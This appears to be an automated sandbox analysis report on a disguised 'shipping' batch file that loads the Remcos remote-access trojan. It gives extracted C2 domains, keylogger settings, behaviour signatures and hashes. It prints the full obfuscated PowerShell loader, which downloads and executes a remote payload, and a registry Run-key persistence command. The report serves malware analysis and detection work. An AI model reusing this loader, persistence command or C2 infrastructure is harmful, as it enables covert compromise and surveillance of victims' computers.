Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    28-11-2024 05:58

General

  • Target

    awb_shipping_post_28112024224782020031808174CN28112024000001124.bat

  • Size

    6KB

  • MD5

    f37fb720f0662ce5bac44b7e19b03864

  • SHA1

    daeac2db53e78b1139d1ef3351ecda6c66deb09e

  • SHA256

    df2cba523549cdb60b69c1de396325a4bf3d86d1013378a169273c4aa99d4da9

  • SHA512

    9aa63156cb66c548a0703c3f0a21d0e26d7939c62c0268b909e8c9ae3a1189753c3c0cec18e3e5e4cd806e4ea274e721faa0e41ee6cfd36a862ba581201b33fc

  • SSDEEP

    192:YEo+WKuRms3YnN5ekWwsQRbXwwgYTVVSGogXs3:DojPgs3UN5LWw7RDwwppjvc3

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-WMSLPY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request (4 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Runs PowerShell with the display window hidden.

  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry key (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (3 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (19 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_28112024224782020031808174CN28112024000001124.bat"
    1⤵
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden ";$Medallionist='Tyrosinase';;$Cream='Reedbirds';;$Gimmicker='Filterability';;$Branchiocardiac='Kanons176';;$Strandvejen178='Hysteranthous';;$Tagmemes=$host.Name;function Ignorher($brugeradgangskodes){If ($Tagmemes) {$Stillevejen=5} for ($Modifikationers=$Stillevejen;;$Modifikationers+=6){if(!$brugeradgangskodes[$Modifikationers]) { break }$Unring132+=$brugeradgangskodes[$Modifikationers]}$Unring132}function Bibeholdelsernes($Objektsprogs){ .($Tjenestemandsansats) ($Objektsprogs)}$Kulturbegivenheden=Ignorher ' PrednPlejeeTauroTP iap. BoxtwGravreNonsebmo otCAutokl RubbICoaduEStahlnPlurit';$Chiniofon=Ignorher 'Pto aM I dvoTrommzKoketiHightlHa.drl Yella Unlo/';$Untoppled=Ignorher 'FejlfTNervelSundhsOphng1 inge2';$Undervisningspligtige=' Fle.[ Ami NChumaERestaTpassb.TornoSSta leHonn.RC nseV Perui ndskc llegeExtinp Disaosar eiNoritnGaulltLettem.lgorAEidolNUoverAAfgifgSt laE An,eRUrete]Foutr:Snore:BefipS MuntEHavanCA.penutyt,erFatteIGenavTToxicYVrdigp GeneR.holao Co.gTRok,uoPortaCLambiO S inLDayr,=Vrlsl$ BedaUA,vernP mpetWh.weO eos PSquirpbkkenLBe,isEcarbuD';$Chiniofon+=Ignorher 'Dyrkn5Uafla.Be,an0Breto vold( erdeWEquiliJouncn SlavdCurreoHmoglwYderrs Slid ForskNA tacTSagso Diagr1Depri0Sid l. ocal0Emmar;Voksn BoniWRevyeiFidgenBalan6Gugge4Regnb;Frag anskuxAlec,6Undse4Impas; B ot Caulr depovNitra:Stvgr1 Sma.3 Pych1 Infl..asta0Nazif) Accu GendbGForbleKontocdanaik SereoBeslu/ V ri2Asfe 0Barry1Troph0.itha0Fremd1Tatte0 Indl1Perga KupezFOutwaiVallirSprineTur ufDuplioSjlstxbaadt/ ,ace1 Sv s3Graen1Di fu. 
Dep,0';$Sjussendes=Ignorher 'Moh iuDi trsSavoneKnstrRMilli-OblivAQuantgNettoeRevarnKlockT';$Styrtgodsets=Ignorher 'SoleuhBudbrtSt vbtReforpUnivesSens,: pbyd/Tai.b/EndodgSamm aDeplorAppethDrmmeounexcuIridod CostjC nado AbsquFor.br RomamSlids.PlaticBrekkospiramUnc a/Sv ngPTho,goSolnepElekt2Limfa.SkummpUdpolnJohangBundt>Leucoh BaketTurbetUnbeap.arens,xtem:G,nop/ Bank/Su.dogIn baaQuellrarterh Reduo Nomau ForfdEndowjLangboPrintuse vmrUngoamHjernoForfanInjuneVansk. Precc.malgo ummemTaluk/ L.nnPSve sowiss,pNonni2Inter.AfkorpHermenSne jg';$Tonguester=Ignorher 'Badme>';$Tjenestemandsansats=Ignorher 'LogicIKinesE ksax';$Reinspector='Udgiftsfringers';$Oplysningslinier='\Metoposcopist.Rat';Bibeholdelsernes (Ignorher ' Sprt$NonsyGDec,mlafmaloKildeBSemicASeptaLSorte:RaadsmTran aFerasg ByhanU.gkaUCitraSUdfldsHan oES adiN Peri=Seric$SquileDe.asnR flivAller:Aepy.AHan,npRok.ePFrostD FortaLogouTDoughASkild+ u,il$.enteOAfbrnpLejedLPhospYNdrinsMillinAtaliIRa iaNPro uGRuffeSForesLPab sIPredenpartrIU dereEchoiR');Bibeholdelsernes (Ignorher 'alkoh$YpperGModsiLjovilo D.bbb nweaAHder,lLimon: ,rbeh CatrU AurigCampauTowarEGalden ninoo PallT.impliFidusCKrage=Tolds$BrutasDerivTMascuYGuerdr.gesaTCroniGChylioSpis,D Aus.SMusc,eGoofyTOrmuzS,orfa. Ra iSEfterpFor,aLFrog I PicrTstad,( uadr$OverfT Tre OLeng,NOutdogSrgebuLefleE corssSengeT OcclENormaRKoste)');Bibeholdelsernes (Ignorher $Undervisningspligtige);$Styrtgodsets=$Huguenotic[0];$Verdensbermte245=(Ignorher 'Cheon$NovelgSimpllunderoPitwoBOncogA rednlHeath:SpragaLact gKonvorBarbaIAl.erOMobsmtFeder=A greNCauliEEng nWAvici-HeephostrafB AfvijTuetseFratecDorottBest GastrS co,sYOps,rS Phost paatE,atchMSupe.. Inte$ForsyKLadcyuNoninl EloxTGoldmuBortrr ,nylbYankeeSilliGSchwei elonvKompae orlenEteoch FolkeexfoddPrecoeKendeN');Bibeholdelsernes ($Verdensbermte245);Bibeholdelsernes (Ignorher 'M,sta$ AttiAEjbrigUndocrEquiniUvul,o Fr mtDefos. 
D.poH rudee CrosaMoha dCataseS,iffrRuykosDevil[Actin$ReiduSHobosjBhut uT ffesUtaalsMicr,e Cig n.ilstdHer ieEconosUnf o]Fibri= c ck$SimulChelinhGree i PsalnDdskniAnparoSi.rafC.stooLedevn');$Hjhusets=Ignorher 'Overd$ Occ AByporgKarenr.kskliCasbaoTascat Outr.ruelsDLiparoSneb,wAtominRediglHypo oBlinda nstad ci aFSc otiOptatl Re.se Reco( Kno $HaandSMiss tGallsy Ve nrAbductTrippgEvertoGraasd,onkosHarmoe howtYtri sMa,da,tagdr$DereaBHakkeoSkrivyG.llekOmhanoM.dbetNonsptSengeeImagetGloe )';$Boykottet=$Magnussen;Bibeholdelsernes (Ignorher 'Frans$OmganGTronaLFllesOFrbevbEurasACo lolG.aaf: B gsAHoldnCUdenlC ftee,hospPT rpeTExfetA Tingb Cer,ECo pllFinaltAkros=Drill(AnstatSa viESvngnsAnysrt,omfr-Lyna,pitha.aboyauT KippHInhab triak$StabsbDagspO JagtyIm ieK tubboPyttaT In itEmbryeHagerT Ency)');while (!$Acceptabelt) {Bibeholdelsernes (Ignorher 'S rut$Reo hg DebulCo,taosalutbS,aala lmenlUnsqu:HleriTWaferiBlgebl oreahAstrouLngd gSn.sdnPseudiGrandn rembgVejbye,dholrUn onnRestre ortr=Caval$ Sk,mMR kshaFy,stg L,vunFrosti Carbf.ygefiPalmec eside tjlen roct') ;Bibeholdelsernes $Hjhusets;Bibeholdelsernes (Ignorher 'Antabs ammotValueaPuppeRspekttHelti- ranssInterlPresaeInvenePunleP B st Orkid4');Bibeholdelsernes (Ignorher ' ala$Skittg NonsLBedr OLen tbS alsaZi.ziLpee.a: MowaA,illeC FletCGenneEJvnfrp ultit Pse.AAfd ibContreBronzlAnlgsTTh.gg=thirt(OpsugTSellaeVastisUsympTBlast-Je stPMarmoaIdenttHoptoh Mom. 
For k$ RaadbTubero PycnY UrteKG itao.chsaTFedtptWellfE t rbtFibov)') ;Bibeholdelsernes (Ignorher ' f de$togemG,recklBiogrOKommebRegneaDavidLForkr:ProvsSPosttkGra.daVrdigLTz,mmPMoul mUnco a yranrTangl=K ekr$Fere,GDisselG omoOTaberBBlomsADybdelMi ro:InterASurgefSerraHskaanvS,radlMicroeDi,soN rphadLu reESladrsSamle+ snor+Tramp% Tom $UrhnehFrem uN uriGStarsu SaedeUnethNSparrOban.uT langi AskeCTr ne.Non ecmurreOCitrou Fi rN Dry,t') ;$Styrtgodsets=$Huguenotic[$Skalpmar]}$Herbs=324054;$Grnsevrdi45=32132;Bibeholdelsernes (Ignorher 'Kamgr$Ph liGHono,LSpl,tOCellmB CirkAPegaslTruss:Gaf.ebNontyIDe,idl ContlOcellePresbdTe ses Nos,KUidenroversM SkefeAstak Unvar=,alat salivGDumbyeenspntDjrvh-D.ailCBriosoTemp.nCruxftMorgeESlut n Rvestreabb Achro$,nchobusmm oye.omYTuskhkYde los ueptSupe,TParaneUdf,yt');Bibeholdelsernes (Ignorher 'di ho$samiagNonmalBo asoSyst bRuskra C ndlPassi:UnoblLLoud,i UngarOverfiGrns,p oruri knlip Ra ieSupra Rotu =Gener Ha,d[SinicS valey BondsSvngntInhumeFor.smpetro. Mo eCAbreioArguinMonarvIldkueHewlerFladltCharc]Vamos:T wag:PhysaFAromarEskoroFlyvem aladB Sud.a Convs Rec,eBorgm6Panel4ZippeSPavektMaterrNontaiGuffenSkarngdevoi( oral$UnsouBSamoriMout.l FarvlTe dieInterd Tribs ModakUvsner G anm F ereEks,e)');Bibeholdelsernes (Ignorher 'Ka tr$Hyp rGClewsl UtilO .rivBT.nakaT.staLKaffe:Te efuInstaN SurrDInfert DoupAContrgDejagECloacL SterSPa lyeSkinds,emitBSpin eKvldeSLong,tFo.dme appmBu esMEucalEFasellBesviS redbE CubiN Vad. 
Jamb=Re en Melle[TriviSSu.styFla mS obultKrypte KmpemDkner.s.lgsT P steNaboiXN nlat uadr.Spunse DedenSyrneC Verso,odlyd Regei ForhnGnastgSelen]Menue:hemit:Sha tALitteSIllegC statI On,uiHiber.Centig ScarEpukleT KontSGr wntBrystr Midti KvinN R jsG Untr(Count$ DuodlF guriVurderR selIMindrpExtreIPens PA,parESuper)');Bibeholdelsernes (Ignorher ' ongr$MargiGAnascLNonavo Margb,rundAGuineLWivia: edlehB dknKJos pK Sto E orfaL RetsBDecusEUhyrlnCarroE BranSS,rot= snre$ no auMinicNindkodBuffeTS enkA.igmaGL gkaeSamfuLPrydesCw.ite Af aSUnderB.elviE Gal sHyb,iTUdst EDeglamR conmCume.eski oLPardasIsotoEHaloxN okse.MdeafsDest UBssesBNixonsNyblotExplaR,ysstIIndflnDoktogPolyp(Inter$ M.ndHK naleDelstR uoyeBRkedaSLling,Bla k$Gulchg Po trColomnProgrsArterE AcylvUb leRFertiDAbsceISkole4amtst5M ter)');Bibeholdelsernes $hkkelbenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (launched with the same obfuscated script argument as the powershell.exe process with PID 2720 above; not repeated here)
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2932

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Metoposcopist.Rat

    Filesize

    463KB

    MD5

    f1e051f3aaa58d075d105694556aa551

    SHA1

    c9cc0b56985131d889fdadc263e708af200fe79c

    SHA256

    aa6882110f1bc455a4e6d61e443cb0930df88f089eabab30c56d8059b002a5b3

    SHA512

    e675f43ccf46a8e33ed344800c763f4d895c6af2e9b27ef49acd354eee7ac8ff5803b4926d199677b19b9428054fbdadec2985b9ad1b22b156478d36bb1c55dd

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6I40OXZIP87TBL5KQ8C3.temp

    Filesize

    7KB

    MD5

    4fc0bb4e2a220e8244001af2f94e933b

    SHA1

    2bc4206e1ff5534a65d67b14fd2a386b9c9eca85

    SHA256

    480cb0a9d6d5c713277b2c234ccf19d857d8bd6b2260c018662d0d6f89cf4826

    SHA512

    50258045f8a927eac9812ad41ee6881c4b7ebed988abaf17aeb0e8137732a7a2e91c85669f6a14e5ab3593cd384f18f6c7b9b1281d4d69dd8ae2d4b2c417e375

  • memory/1984-18-0x0000000006590000-0x0000000009894000-memory.dmp

    Filesize

    51.0MB

  • memory/2148-35-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

  • memory/2148-19-0x0000000000400000-0x0000000000581000-memory.dmp

    Filesize

    1.5MB

  • memory/2720-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

    Filesize

    4KB

  • memory/2720-11-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-14-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-7-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

  • memory/2720-6-0x0000000002720000-0x0000000002728000-memory.dmp

    Filesize

    32KB

  • memory/2720-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB